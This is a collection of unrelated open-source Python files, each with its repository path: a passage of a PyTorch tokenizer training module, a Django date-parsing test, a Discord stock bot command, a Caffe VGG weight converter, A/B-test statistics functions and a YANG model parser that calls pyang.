word_emb_ext = word_emb_ext / len(x_emb)
word_emb_ext = torch.tanh(word_emb_ext)
x_emb = word_emb_ext
x_spa_emb = self._spa_emb(x_spa)
x_emb = mask_concat([x_emb, x_char_emb], 0.33, self.training, self._get_device())
x_emb = torch.cat([x_emb, x_spa_emb], dim=-1)
x = torch.cat([x_emb, x_lang], dim=-1).permute(0, 2, 1)
x_lang = x_lang.permute(0, 2, 1)
half = self._config.cnn_filter // 2
res = None
cnt = 0
for conv in self._convs:
conv_out = conv(x)
tmp = torch.tanh(conv_out[:, :half, :]) * torch.sigmoid((conv_out[:, half:, :]))
if res is None:
res = tmp
else:
res = res + tmp
x = torch.dropout(tmp, 0.2, self.training)
cnt += 1
if cnt != self._config.cnn_layers:
x = torch.cat([x, x_lang], dim=1)
x = x + res
x = torch.cat([x, x_lang], dim=1)
x = x.permute(0, 2, 1)
return self._output(x)
def validation_step(self, batch, batch_idx):
if batch['x_input'] is None:
print("Return 0")
return None
x_lang = batch['x_lang']
x_text = batch['x_text']
y_offset = batch['y_offset'].cpu().numpy()
y_target = batch['y_output'].cpu().numpy()
y_len = batch['y_len'].cpu().numpy()
x_l = x_lang.cpu().numpy()
y_pred = self.forward(batch)
y_pred = torch.argmax(y_pred, dim=-1).detach().cpu().numpy()
for ii in range(len(y_len)):
ofs = y_offset[ii]
lang = x_l[ii] - 1
for jj in range(y_len[ii]):
self._dev_results[lang].append([x_text[ii][jj], y_target[ii, jj + ofs], y_pred[ii, jj + ofs]])
def validation_epoch_end(self, outputs) -> None:
# empty accumulator
# results = {langid: {'SENT_F': 0, 'TOK_F': 0} for langid in self._id2lang}
results = {}
for lang in self._dev_results:
data = self._dev_results[lang]
g_sents = []
p_sents = []
tok_p = ''
tok_g = ''
g_sent = []
p_sent = []
for example in data:
target = example[1]
pred = example[2]
text = example[0].replace('▁', '')
tok_g += text
tok_p += text
if target == 2 or target == 3 or target == 4:
if tok_g.strip() != '':
g_sent.append(tok_g)
tok_g = ''
if target == 4:
if len(g_sent) != 0:
g_sents.append(g_sent)
g_sent = []
if pred == 2 or pred == 3 or pred == 4:
if tok_p.strip() != '':
p_sent.append(tok_p)
tok_p = ''
if pred == 4:
if len(p_sent) != 0:
p_sents.append(p_sent)
p_sent = []
if tok_g.strip() != '':
g_sent.append(tok_g)
if len(g_sent) != 0:
g_sents.append(g_sent)
if tok_p.strip() != '':
p_sent.append(tok_p)
if len(p_sent) != 0:
p_sents.append(p_sent)
sent_f, tok_f = _conll_eval(g_sents, p_sents)
if self._language_codes is not None:
lang = self._language_codes[lang]
results[lang] = {}
results[lang]['sent'] = sent_f
results[lang]['token'] = tok_f
self.log('val/SENT/{0}'.format(lang), sent_f)
self.log('val/TOKEN/{0}'.format(lang), tok_f)
self._dev_results = {i: [] for i, _ in enumerate(self._language_codes)}
self._epoch_results = self._compute_early_stop(results)
self.log('val/early_meta', self._early_stop_meta_val)
def training_step(self, batch, batch_idx):
if batch['x_input'] is None:
print("Return 0")
return None
y_target = batch['y_output']
if self._max_seq_len != -1 and y_target.shape[1] > self._max_seq_len: # fix for HF
return None
y_pred = self.forward(batch)
loss = F.cross_entropy(y_pred.view(-1, y_pred.shape[2]), y_target.view(-1), ignore_index=0)
return loss
def load(self, model_path: str, device: str = 'cpu'):
self.load_state_dict(torch.load(model_path, map_location='cpu')['state_dict'])
self.to(device)
def process(self, raw_text, collate: TokenCollate, batch_size=32, num_workers: int = 4, lang_id: int = 0):
raw_text = raw_text.replace('\n', ' ').replace('\r', ' ')
new_text = raw_text.replace(' ', ' ')
while new_text != raw_text:
raw_text = new_text
new_text = raw_text.replace(' ', ' ')
self.eval()
from cube.networks.utils_tokenizer import TokenDatasetLive
dataset = TokenDatasetLive(raw_text, collate.get_tokens)
collate._lang_id = lang_id
dataloader = DataLoader(dataset, batch_size=batch_size, collate_fn=collate.collate_fn,
shuffle=False, num_workers=num_workers)
toks = []
preds = []
import tqdm
for batch in dataloader: # tqdm.tqdm(dataloader):
for key in batch:
if isinstance(batch[key], torch.Tensor):
batch[key] = batch[key].to(self._device)
x_text = batch['x_text']
y_offset = batch['y_offset'].cpu().numpy()
y_len = batch['y_len'].cpu().numpy()
with torch.no_grad():
y_pred = self.forward(batch)
y_pred = torch.argmax(y_pred, dim=-1).detach().cpu().numpy()
for ii in range(len(y_len)):
ofs = y_offset[ii]
for jj in range(y_len[ii]):
toks.append(x_text[ii][jj])
preds.append(y_pred[ii, jj + ofs])
p_sents = []
tok_p = ''
p_mwes = []
p_sent = []
p_mwe = []
for pred, text in zip(preds, toks):
text = text.replace('▁', '')
tok_p += text
if pred == 2 or pred == 3 or pred == 4:
if tok_p.strip() != '':
p_sent.append(tok_p)
if pred == 3:
p_mwe.append(True)
else:
p_mwe.append(False)
tok_p = ''
if pred == 4:
if len(p_sent) != 0:
p_sents.append(p_sent)
p_mwes.append(p_mwe)
p_sent = []
p_mwe = []
if tok_p.strip() != '':
p_sent.append(tok_p)
p_mwe.append(False)
if len(p_sent) != 0:
p_sents.append(p_sent)
p_mwes.append(p_mwe)
d = Document()
for sent, mwe in zip(p_sents, p_mwes):
seq = []
cnt = 0
spaceafter = "_"
for w, m in zip(sent, mwe):
cnt += 1
seq.append(Word(cnt, w, '_', '_', '_', '_', 0, '_', '_', spaceafter))
if m:
seq[-1].space_after += ';compund'
s = Sentence(sequence=seq, lang_id=lang_id)
d.sentences.append(s)
return d
def configure_optimizers(self):
return torch.optim.AdamW(self.parameters())
def _compute_early_stop(self, res):
for lang in res:
if res[lang]["sent"] > self._res[lang]["sent"]:
self._early_stop_meta_val += 1
self._res[lang]["sent"] = res[lang]["sent"]
res[lang]["sent_best"] = True
if res[lang]["token"] > self._res[lang]["token"]:
self._early_stop_meta_val += 1
self._res[lang]["token"] = res[lang]["token"]
res[lang]["token_best"] = True
return res
def _get_device(self):
if self._lang_emb.weight.device.type == 'cpu':
return 'cpu'
return '{0}:{1}'.format(self._lang_emb.weight.device.type, str(self._lang_emb.weight.device.index))
def _detect_no_space_lang(document: Document):
seen_spc = 0
POLL_RANGE = 50
for ii in range(POLL_RANGE):
index = random.randint(0, len(document.sentences) - 1)
text = document.sentences[index].text.strip()
if ' ' in text:
seen_spc += 1
if seen_spc / POLL_RANGE > 0.5:
return False
else:
return True
class PrintAndSaveCallback(pl.callbacks.Callback):
def __init__(self, store_prefix):
super().__init__()
self.store_prefix = store_prefix
def on_validation_end(self, trainer, pl_module):
metrics = trainer.callback_metrics
epoch = trainer.current_epoch
# from pprint import pprint
# pprint(metrics)
for lang in pl_module._epoch_results:
res = pl_module._epoch_results[lang]
if "sent_best" in res:
trainer.save_checkpoint(self.store_prefix + "." + lang + ".sent")
if "token_best" in res:
trainer.save_checkpoint(self.store_prefix + "." + lang + ".tok")
trainer.save_checkpoint(self.store_prefix + ".last")
s = "{0:30s}\tSENT\tTOKEN".format("Language")
print("\n\n\t" + s)
print("\t" + ("=" * (len(s) + 9)))
for lang in pl_module._language_codes:
sent = metrics["val/SENT/{0}".format(lang)]
token = metrics["val/TOKEN/{0}".format(lang)]
msg = "\t{0:30s}:\t{1:.4f}\t{2:.4f}".format(lang, sent, token)
print(msg)
print("\n")
def _conll_eval(gold, pred):
f = open('tmp_g.txt', 'w')
for sent in gold:
for ii in range(len(sent)):
head = ii
f.write('{0}\t{1}\t_\t_\t_\t_\t{2}\t_\t_\t_\n'.format(ii + 1, sent[ii], head))
f.write('\n')
f.close()
f = open('tmp_p.txt', 'w')
for sent in pred:
for ii in range(len(sent)):
head = ii
f.write('{0}\t{1}\t_\t_\t_\t_\t{2}\t_\t_\t_\n'.format(ii + 1, sent[ii], head))
f.write('\n')
f.close()
from _cube.misc.conll18_ud_eval_wrapper import conll_eval
result = conll_eval('tmp_g.txt', 'tmp_p.txt')
if result is None:
return 0, 0
else:
return result['Sentences'].f1, result['Tokens'].f1
"""
if __name__ == '__main__':
from cube.io_utils.misc import ArgParser
argparser = ArgParser()
# run argparser
args = argparser()
print(args) # example
import json
langs = json.load(open(args.train_file))
doc_train = Document()
doc_dev = Document()
id2lang = {}
for ii in range(len(langs)):
lang = langs[ii]
print(lang[1], ii)
doc_train.load(lang[1], lang_id=ii)
doc_dev.load(lang[2], lang_id=ii)
id2lang[ii] = lang[0]
# ensure target dir exists
target = args.store
i = args.store.rfind("/")
if i > 0:
target = args.store[:i]
os.makedirs(target, exist_ok=True)
enc = Encodings()
enc.compute(doc_train, None)
enc.save('{0}.encodings'.format(args.store))
config = TokenizerConfig()
no_space_lang = _detect_no_space_lang(doc_train)
print("NO_SPACE_LANG = " + str(no_space_lang))
config.no_space_lang = no_space_lang
config.lm_model = args.lm_model
if args.config_file:
config.load(args.config_file)
if args.lm_model is not None:
config.lm_model = args.lm_model
config.save('{0}.config'.format(args.store))
# helper = LMHelper(device=args.lm_device, model=config.lm_model)
# helper.apply(doc_dev)
# helper.apply(doc_train)
trainset = TokenizationDataset(doc_train)
devset = TokenizationDataset(doc_dev, shuffle=False)
collate = TokenCollate(enc, lm_device=args.lm_device, lm_model=args.lm_model, no_space_lang=config.no_space_lang)
train_loader = DataLoader(trainset, batch_size=args.batch_size, collate_fn=collate.collate_fn, shuffle=True,
num_workers=args.num_workers)
val_loader = DataLoader(devset, batch_size=args.batch_size, collate_fn=collate.collate_fn,
num_workers=args.num_workers)
model = Tokenizer(config=config, encodings=enc, id2lang=id2lang)
# training
early_stopping_callback = EarlyStopping(
monitor='val/early_meta',
patience=args.patience,
verbose=True,
mode='max'
)
if args.gpus == 0:
acc = 'ddp_cpu'
else:
acc = 'ddp'
trainer = pl.Trainer(
gpus=args.gpus,
accelerator=acc,
num_nodes=1,
default_root_dir='data/',
callbacks=[early_stopping_callback, PrintAndSaveCallback(args, id2lang)],
# limit_train_batches=5,
# limit_val_batches=2,
)
trainer.fit(model, train_loader, val_loader)
"""
|
scale/util/test/test_parse.py | kaydoh/scale | 121 | 12687788 | from __future__ import unicode_literals
import datetime
import django
import mock
from django.test import TestCase
from django.utils.timezone import utc
import util.parse as parse_util
class TestParse(TestCase):
def setUp(self):
django.setup()
def test_duration_to_string(self):
"""Tests converting timedelta duration to ISO duration string"""
duration_1 = datetime.timedelta(seconds=0)
self.assertEqual(parse_util.duration_to_string(duration_1), 'PT0S')
duration_2 = datetime.timedelta(days=4, seconds=58426)
self.assertEqual(parse_util.duration_to_string(duration_2), 'P4DT16H13M46S')
duration_3 = datetime.timedelta(seconds=542.0894)
self.assertEqual(parse_util.duration_to_string(duration_3), 'PT9M2S')
duration_4 = datetime.timedelta(seconds=542.5894)
self.assertEqual(parse_util.duration_to_string(duration_4), 'PT9M3S')
def test_parse_duration(self):
"""Tests parsing a valid ISO duration."""
self.assertEqual(parse_util.parse_duration('PT3H0M0S'), datetime.timedelta(0, 10800))
def test_parse_duration_invalid(self):
"""Tests parsing an invalid ISO duration."""
self.assertIsNone(parse_util.parse_duration('BAD'))
def test_parse_datetime(self):
"""Tests parsing a valid ISO datetime."""
self.assertEqual(parse_util.parse_datetime('2015-01-01T00:00:00Z'),
datetime.datetime(2015, 1, 1, tzinfo=utc))
def test_parse_datetime_invalid(self):
"""Tests parsing an invalid ISO datetime."""
self.assertIsNone(parse_util.parse_datetime('20150101T00:00:00Z'))
def test_parse_datetime_missing_timezone(self):
"""Tests parsing an ISO datetime missing a timezone."""
self.assertRaises(ValueError, parse_util.parse_datetime, '2015-01-01T00:00:00')
@mock.patch('django.utils.timezone.now')
def test_parse_timestamp_duration(self, mock_now):
"""Tests parsing a valid ISO duration."""
mock_now.return_value = datetime.datetime(2015, 1, 1, 10, tzinfo=utc)
self.assertEqual(parse_util.parse_timestamp('PT3H0M0S'), datetime.datetime(2015, 1, 1, 7, tzinfo=utc))
def test_parse_timestamp_datetime(self):
"""Tests parsing a valid ISO datetime."""
self.assertEqual(parse_util.parse_timestamp('2015-01-01T00:00:00Z'),
datetime.datetime(2015, 1, 1, tzinfo=utc))
|
discordbot/stocks/due_diligence/arktrades.py | elan17/GamestonkTerminal | 1,835 | 12687793 | import discord
import pandas as pd
from gamestonk_terminal.stocks.due_diligence import ark_model
import discordbot.config_discordbot as cfg
from discordbot.run_discordbot import logger
from discordbot.helpers import pagination
async def arktrades_command(ctx, ticker="", num=""):
"""Displays trades made by ark [cathiesark.com]"""
try:
# Debug user input
if cfg.DEBUG:
logger.debug("!stocks.dd.arktrades %s", ticker)
if num == "":
pass
else:
if not num.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
num = int(num)
if ticker == "":
raise Exception("A ticker is required")
ark_holdings = ark_model.get_ark_trades_by_ticker(ticker)
if ark_holdings.empty:
raise Exception(
"Issue getting data from cathiesark.com. Likely no trades found.\n"
)
ark_holdings = ark_holdings.drop(columns=["ticker"])
ark_holdings["Total"] = ark_holdings["Total"] / 1_000_000
ark_holdings.rename(
columns={"Close": "Close ($)", "Total": "Total ($1M)"}, inplace=True
)
ark_holdings.index = pd.Series(ark_holdings.index).apply(
lambda x: x.strftime("%Y-%m-%d")
)
if num == "":
ark_holdings_str = ark_holdings.to_string()
else:
ark_holdings_str = ark_holdings.head(num).to_string()
if len(ark_holdings_str) <= 4000:
embed = discord.Embed(
title=f"Stocks: [cathiesark.com] {ticker} Trades by Ark",
description="```" + ark_holdings_str + "```",
colour=cfg.COLOR,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed)
else:
i = 0
str_start = 0
str_end = 4000
columns = []
while i <= len(ark_holdings_str) / 4000:
columns.append(
discord.Embed(
title=f"Stocks: [cathiesark.com] {ticker} Trades by Ark",
description="```" + ark_holdings_str[str_start:str_end] + "```",
colour=cfg.COLOR,
).set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
)
str_end = str_start
str_start += 4000
i += 1
await pagination(columns, ctx)
except Exception as e:
embed = discord.Embed(
title=f"ERROR Stocks: [cathiesark.com] {ticker} Trades by Ark",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed)
|
examples/vgg/caffe2npz.py | souravsingh/chainercv | 1,600 | 12687802 | import argparse
import re
import chainer
from chainer import Link
import chainer.links.caffe.caffe_function as caffe
"""
Please download a weight from here.
http://www.robots.ox.ac.uk/%7Evgg/software/very_deep/caffe/VGG_ILSVRC_16_layers.caffemodel
"""
def rename(name):
m = re.match(r'conv(\d+)_(\d+)$', name)
if m:
i, j = map(int, m.groups())
return 'conv{:d}_{:d}/conv'.format(i, j)
return name
class VGGCaffeFunction(caffe.CaffeFunction):
def __init__(self, model_path):
print('loading weights from {:s} ... '.format(model_path))
super(VGGCaffeFunction, self).__init__(model_path)
def __setattr__(self, name, value):
if self.within_init_scope and isinstance(value, Link):
new_name = rename(name)
if new_name == 'conv1_1/conv':
# BGR -> RGB
value.W.array[:, ::-1] = value.W.array
print('{:s} -> {:s} (BGR -> RGB)'.format(name, new_name))
else:
print('{:s} -> {:s}'.format(name, new_name))
else:
new_name = name
super(VGGCaffeFunction, self).__setattr__(new_name, value)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('caffemodel')
parser.add_argument('output')
args = parser.parse_args()
model = VGGCaffeFunction(args.caffemodel)
chainer.serializers.save_npz(args.output, model)
if __name__ == '__main__':
main()
|
stattests/tests.py | marnikitta/stattests | 130 | 12687805 | <reponame>marnikitta/stattests
import numpy as np
import scipy.stats
def t_test(a, b):
"""
Calculates two-sided t-test p-values for multiple experiments
:param a: np.array shape (n_experiments, n_users), metric values in control group
:param b: np.array shape (n_experiments, n_users), metric values in treatment group
:return: np.array shape (n_experiments), two-sided p-values of t-test in all experimetns
"""
result = list(map(lambda x: scipy.stats.ttest_ind(x[0], x[1]).pvalue, zip(a, b)))
return np.array(result)
def mannwhitney(a, b):
"""
Calculates two-sided t-test p-values for multiple experiments
:param a: np.array shape (n_experiments, n_users), metric values in control group
:param b: np.array shape (n_experiments, n_users), metric values in treatment group
:return: np.array shape (n_experiments), two-sided p-values of Mann-Whitney test in all experimetns
"""
result = list(map(lambda x: scipy.stats.mannwhitneyu(x[0], x[1], alternative='two-sided').pvalue, zip(a, b)))
return np.array(result)
def get_smoothed_ctrs(clicks_0, views_0, clicks_1, views_1, smothing_factor=200.):
"""
Calculates smoothed ctr for every user in every experiment both in treatment and control groups
Smoothed_ctr = (user_clicks + smothing_factor * global_ctr) / (user_views + smothing_factor)
:param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment
:param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment
:param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment
:param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment
:param smothing_factor: float
:return: (np.array, np.array) shape (n_experiments, n_users), smoothed ctrs for every user in every experiment
"""
global_ctr = (np.sum(clicks_0, axis=1) / np.sum(views_0, axis=1)).reshape(-1, 1)
ctrs_0 = (clicks_0 + smothing_factor * global_ctr) / (views_0 + smothing_factor)
ctrs_1 = (clicks_1 + smothing_factor * global_ctr) / (views_1 + smothing_factor)
return ctrs_0, ctrs_1
def bootstrap(ctrs_0, weights_0, ctrs_1, weights_1, n_bootstrap=2000):
"""
Does weighted bootstrap and calculates p-value according to the bootstraped distribution
:param ctrs_0: np.array shape (n_experiments, n_users), CTRs of every user from control group in every experiment
:param weights_0: np.array (n_experiments, n_users), weight of every user from control group in every experiment
:param ctrs_1: np.array (n_experiments, n_users), CTRs of every user from treatment group in every experiment
:param weights_1: np.array (n_experiments, n_users), weight of every user from treatment group in every experiment
:param n_bootstrap: int - for every experiment wi will generate n_bootstrap bootstrap pseudo-samples
:return: np.array shape (n_experiments), two-sided p-values of weighted bootstrap test in all experimetns
"""
poisson_bootstraps = scipy.stats.poisson(1).rvs((n_bootstrap, ctrs_0.shape[1])).astype(np.int64)
values_0 = np.matmul(ctrs_0 * weights_0, poisson_bootstraps.T)
weights_0 = np.matmul(weights_0, poisson_bootstraps.T)
values_1 = np.matmul(ctrs_1 * weights_1, poisson_bootstraps.T)
weights_1 = np.matmul(weights_1, poisson_bootstraps.T)
deltas = values_1 / weights_1 - values_0 / weights_0
positions = np.sum(deltas < 0, axis=1)
return 2 * np.minimum(positions, n_bootstrap - positions) / n_bootstrap
def bucketization(ctrs_0, weights_0, ctrs_1, weights_1, n_buckets=200):
"""
Does weighted bucketization and calculates p-values for all experiments using t_test
:param ctrs_0: np.array shape (n_experiments, n_users), CTRs of every user from control group in every experiment
:param weights_0: np.array (n_experiments, n_users), weight of every user from control group in every experiment
:param ctrs_1: np.array (n_experiments, n_users), CTRs of every user from treatment group in every experiment
:param weights_1: np.array (n_experiments, n_users), weight of every user from treatment group in every experiment
:param n_buckets: int, nubmer of buckets
:return: np.array shape (n_experiments), two-sided p-values of weighted bucketization test in all the experimetns
"""
n_experiments, n_users = ctrs_0.shape
values_0 = np.zeros((n_experiments, n_buckets))
values_1 = np.zeros((n_experiments, n_buckets))
for b in np.arange(n_buckets):
ind = np.arange(b * n_users / n_buckets, b * n_users / n_buckets + n_users / n_buckets).astype(np.int)
values_0[:, b] = np.sum(ctrs_0[:, ind] * weights_0[:, ind], axis=1) / np.sum(weights_0[:, ind], axis=1)
values_1[:, b] = np.sum(ctrs_1[:, ind] * weights_1[:, ind], axis=1) / np.sum(weights_1[:, ind], axis=1)
return t_test(values_0, values_1)
def binomial_test(global_ctr_0, total_views_0, global_ctr_1, total_views_1):
"""
Calculates two-sided p-values for all the experiments on global CTRs using z-test
:param global_ctr_0: np.array shape (n_experiments), global ctr in control group in every experiment
:param total_views_0: np.array shape (n_experiments), sum of views in control group in every experiment
:param global_ctr_1: np.array shape (n_experiments), global ctr in treatment group in every experiment
:param total_views_1: np.array shape (n_experiments), sum of views in treatment group in every experiment
:return: np.array shape (n_experiments), two-sided p-values of delta-method on CTRs in all the experimetns
"""
overall_ctrs = (global_ctr_0 * total_views_0 + global_ctr_1 * total_views_1) / (total_views_0 + total_views_1)
z_stats = (global_ctr_0 - global_ctr_1) / np.sqrt(
overall_ctrs * (1 - overall_ctrs) * (1. / total_views_0 + 1. / total_views_1))
return 2 * np.minimum(scipy.stats.norm(0, 1).cdf(z_stats), 1 - scipy.stats.norm(0, 1).cdf(z_stats))
def delta_method_ctrs(clicks_0, views_0, clicks_1, views_1):
"""
Calculates two-sided p-values for all the experiments on CTRs using delta-method
:param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment
:param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment
:param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment
:param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment
:return: np.array shape (n_experiments), two-sided p-values of delta-method on CTRs in all the experimetns
"""
n_experiments, n_users = views_0.shape
mean_clicks_0, var_clicks_0 = np.mean(clicks_0, axis=1), np.var(clicks_0, axis=1)
mean_clicks_1, var_clicks_1 = np.mean(clicks_1, axis=1), np.var(clicks_1, axis=1)
mean_views_0, var_views_0 = np.mean(views_0, axis=1), np.var(views_0, axis=1)
mean_views_1, var_views_1 = np.mean(views_1, axis=1), np.var(views_1, axis=1)
cov_0 = np.mean((clicks_0 - mean_clicks_0.reshape(-1, 1)) * (views_0 - mean_views_0.reshape(-1, 1)),
axis=1)
cov_1 = np.mean((clicks_1 - mean_clicks_1.reshape(-1, 1)) * (views_1 - mean_views_1.reshape(-1, 1)),
axis=1)
var_0 = var_clicks_0 / mean_views_0 ** 2 + var_views_0 * mean_clicks_0 ** 2 / mean_views_0 ** 4 - 2 * mean_clicks_0 / mean_views_0 ** 3 * cov_0
var_1 = var_clicks_1 / mean_views_1 ** 2 + var_views_1 * mean_clicks_1 ** 2 / mean_views_1 ** 4 - 2 * mean_clicks_1 / mean_views_1 ** 3 * cov_1
ctrs_0 = np.sum(clicks_0, axis=1) / np.sum(views_0, axis=1)
ctrs_1 = np.sum(clicks_1, axis=1) / np.sum(views_1, axis=1)
z_stats = (ctrs_1 - ctrs_0) / np.sqrt(var_0 / n_users + var_1 / n_users)
p_ctr_delta = 2 * np.minimum(scipy.stats.norm(0, 1).cdf(z_stats), 1 - scipy.stats.norm(0, 1).cdf(z_stats))
return p_ctr_delta
def intra_user_correlation_aware_weights(clicks_0, views_0, views_1):
"""
Calculates weights for UMVUE global ctr estimate for every user in every experiment both in treatment and control groups
:param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment
:param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment
:param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment
:return: (np.array, np.array) shape (n_experiments, n_users), weights for every user in every experiment
"""
ri = clicks_0 / views_0
s3 = clicks_0 * (1 - ri) ** 2 + (views_0 - clicks_0) * ri ** 2
s3 = np.sum(s3, axis=1) / np.sum(views_0 - 1, axis=1)
rb = np.mean(clicks_0 / views_0, axis=1).reshape(-1, 1)
s2 = clicks_0 * (1 - rb) ** 2 + (views_0 - clicks_0) * rb ** 2
s2 = np.sum(s2, axis=1) / (np.sum(views_0, axis=1) - 1)
rho = np.maximum(0, 1 - s3 / s2).reshape(-1, 1)
w_0 = views_0 / (1 + (views_0 - 1) * rho)
w_1 = views_1 / (1 + (views_1 - 1) * rho)
return w_0, w_1
def linearization_of_clicks(clicks_0, views_0, clicks_1, views_1):
"""
Fits linear model clicks = k * views and returns clicks - k * views (e.g. it accounts for correlation of
clicks and views)
:param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment
:param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment
:param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment
:param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment
:return: (np.array, np_array) shape (n_experiments), linearized clicks for every user in every experiment
"""
k = clicks_0.flatten().sum() / views_0.flatten().sum()
L_0 = clicks_0 - k * views_0
L_1 = clicks_1 - k * views_1
return L_0, L_1
def permutation_test(clicks_0: np.ndarray,
views_0: np.ndarray,
clicks_1: np.ndarray,
views_1: np.ndarray,
samples: int = 2000) -> np.ndarray:
n_experiments = views_0.shape[0]
n_users_0 = views_0.shape[1]
n_users_1 = views_1.shape[1]
permutations = np.zeros((samples, n_users_0 + n_users_1)).astype(np.int32)
permutation = np.arange(n_users_0 + n_users_1)
for i in range(samples):
np.random.shuffle(permutation)
permutations[i] = permutation.copy()
permutation_flags = (permutations < n_users_0).astype(np.int32)
concated_views = np.hstack((views_0, views_1))
concated_clicks = np.hstack((clicks_0, clicks_1))
clicks_sum_0 = np.matmul(concated_clicks, permutation_flags.T)
clicks_sum_1 = np.matmul(concated_clicks, 1 - permutation_flags.T)
views_sum_0 = np.matmul(concated_views, permutation_flags.T)
views_sum_1 = np.matmul(concated_views, 1 - permutation_flags.T)
null_stats = clicks_sum_1 / views_sum_1 - clicks_sum_0 / views_sum_0
null_stats = np.sort(null_stats)
p_values = np.zeros(n_experiments)
for i in range(n_experiments):
exp_stat = clicks_1[i].sum() / views_1[i].sum() - clicks_0[i].sum() / views_0[i].sum()
insert_position = np.searchsorted(null_stats[i], exp_stat)
p_values[i] = 2 * np.minimum(samples - insert_position, insert_position) / samples
return p_values
|
server/explorer/utils/yang.py | s-bauer/yang-explorer | 437 | 12687816 | """
Copyright 2015, Cisco Systems, Inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
@author: <NAME>, Cisco Systems, Inc.
"""
import os
import re
import glob
import logging
import subprocess
from sets import Set
import lxml.etree as ET
from django.conf import settings
from explorer.utils.dygraph import DYGraph
from explorer.utils.misc import ServerSettings
class Parser(object):
"""
Basic Yang modulename parser
"""
def __init__(self, filename):
self.module = None
self.revision = None
self.imports = []
self.includes = []
if not os.path.exists(filename):
return
module_re = re.compile("""^\s*[sub]*module\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")
revision_re = re.compile("""^\s*revision\s+['"]?\s*(\w+-\w+-\w+)\s*['"]?\s*""")
import_re = re.compile("""^\s*import\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")
include_re = re.compile("""^\s*include\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")
with open(filename, 'r') as f:
for line in f:
if self.module is None:
res = module_re.match(line)
if res is not None:
self.module = res.group(1).strip()
continue
imp = import_re.match(line)
if imp is not None:
self.imports.append(imp.group(1).strip())
continue
inc = include_re.match(line)
if inc is not None:
self.includes.append(inc.group(1).strip())
continue
res = revision_re.match(line)
if res is not None:
self.revision = res.group(1).strip()
break
if self.module is None:
logging.error('Could not parse modulename, uploaded file may be corrupted !!')
def get_filename(self):
"""
Returns: yang file name with version suffix.
"""
if self.revision:
return self.module + '@' + self.revision + '.yang'
return self.module + '.yang'
def get_dependency(self):
"""
Returns: List of dependency (yang imports and includes)
"""
return self.imports + self.includes
def __str__(self):
return self.get_filename() + ' -> ' + str(self.get_dependency())
class Compiler(object):
"""
Compile yang models into cxml
"""
@staticmethod
def compile_cxml(username, session, filename):
"""
Compile yang model and return tuple (boolean, list-of-errors)
"""
logging.debug('Compiling %s .. !!' % filename)
plugins = os.path.join(settings.BASE_DIR, 'explorer', 'plugins')
if not os.path.exists(plugins):
logging.error('CXML Plugin directory is missing .. !!')
return False, None
if subprocess.call(['which', 'pyang']) != 0:
logging.error('Could not find pyang compiler, please install pyang .. !!')
return False, None
basename = os.path.basename(filename)
modulename = basename.split('.')[0].strip()
session_dir = ''
if session is not None:
session_dir = ServerSettings.session_path(session)
if not os.path.exists(session_dir):
logging.error('compile_cxml: Session directory %s not found !!', session_dir)
return False, ["Session error !!"]
yangfile = os.path.join(session_dir, modulename + '.yang')
cxmlfile = os.path.join(session_dir, modulename + '.xml')
else:
yangfile = os.path.join(ServerSettings.yang_path(username), modulename + '.yang')
cxmlfile = os.path.join(ServerSettings.cxml_path(username), modulename + '.xml')
# Verify if yang file exists
if not os.path.exists(yangfile):
logging.debug("compile_cxml: " + yangfile + ' not found !!')
return False, ["Yang module %s not found on server !!" % modulename]
command = ['pyang', '-f', 'cxml', '--plugindir', 'explorer/plugins', '-p']
# include path for pyang compilation
includes = ServerSettings.yang_path(username)
if session_dir:
includes += ':' + session_dir
command.append(includes)
# include dependent models
command += Compiler.get_dependencies(username, [filename], session)
# finally add target module
command.append(yangfile)
# create a callback to handle empty output
def empty_callback(outfile):
module = os.path.basename(outfile)
module = module.split('.')[0]
module = module.split('@')[0]
node = ET.Element('node')
node.set('name', module)
node.set('type', 'module')
with open(outfile, 'w') as fd:
fd.write(ET.tostring(node))
logging.debug('compile_cxml: Empty output from pyang, created default cxml!!')
return Compiler.invoke_compile(command, cxmlfile, empty_callback)
@staticmethod
def compile_pyimport(username, session=None):
"""
Compile yang model and return tuple (boolean, list-of-errors)
"""
plugins = os.path.join(settings.BASE_DIR, 'explorer', 'plugins')
if not os.path.exists(plugins):
logging.error('CXML Plugin directory is missing .. !!')
return False, None
if subprocess.call(['which', 'pyang']) != 0:
logging.error('Could not find pyang compiler, please install pyang .. !!')
return False, None
logging.debug('Rebuilding dependencies for user %s' % username)
# build include path
includes = [ServerSettings.yang_path(username)]
if session is not None:
session_dir = ServerSettings.session_path(session)
if not os.path.exists(session_dir):
logging.error('compile_pyimport: Session directory %s not found !!', session_dir)
return False, ["Session error !!"]
